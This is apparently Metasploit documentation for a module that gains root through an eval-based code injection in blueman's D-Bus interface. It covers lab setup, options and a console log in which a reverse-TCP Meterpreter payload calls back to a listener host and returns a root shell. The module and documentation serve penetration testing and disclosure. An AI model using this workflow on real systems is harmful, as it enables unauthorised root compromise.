## Description

  This module attempts to gain root privileges by exploiting a Python
  code injection vulnerability in blueman versions prior to 2.0.3.

  The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
  `set_dhcp_handler` function which uses user input in a call to `eval`,
  without sanitization, resulting in arbitrary code execution as root.

  This module has been tested successfully with blueman version 1.23
  on Debian 8 Jessie (x64).


## Vulnerable Application

  This module has been tested successfully with:

  * blueman version 1.23 on Debian 8 Jessie (x64)

  Old versions of the `blueman` package are available in [Debian snapshots](https://snapshot.debian.org/).

  The following `/etc/apt/sources.list` configuration will allow a vulnerable
  version of the `blueman` package to be installed:
 
  ```
  deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie main
  deb-src [check-valid-until=no] http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie main
  ```

  Update the package sources with `apt-get -o Acquire::Check-Valid-Until=false update`

  The package can be installed with `apt-get install blueman`


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

  ```
  msf > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 
  msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ...
  [*] Executing payload...
  [*] Sending stage (861348 bytes) to 172.16.191.156
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.156:58863) at 2018-12-24 02:44:25 -0500
  [+] Deleted /tmp/.DKJWL0TG7sm0M5

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : debian-8-1-x64.local
  OS           : Debian 8.1 (Linux 3.16.0-4-amd64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

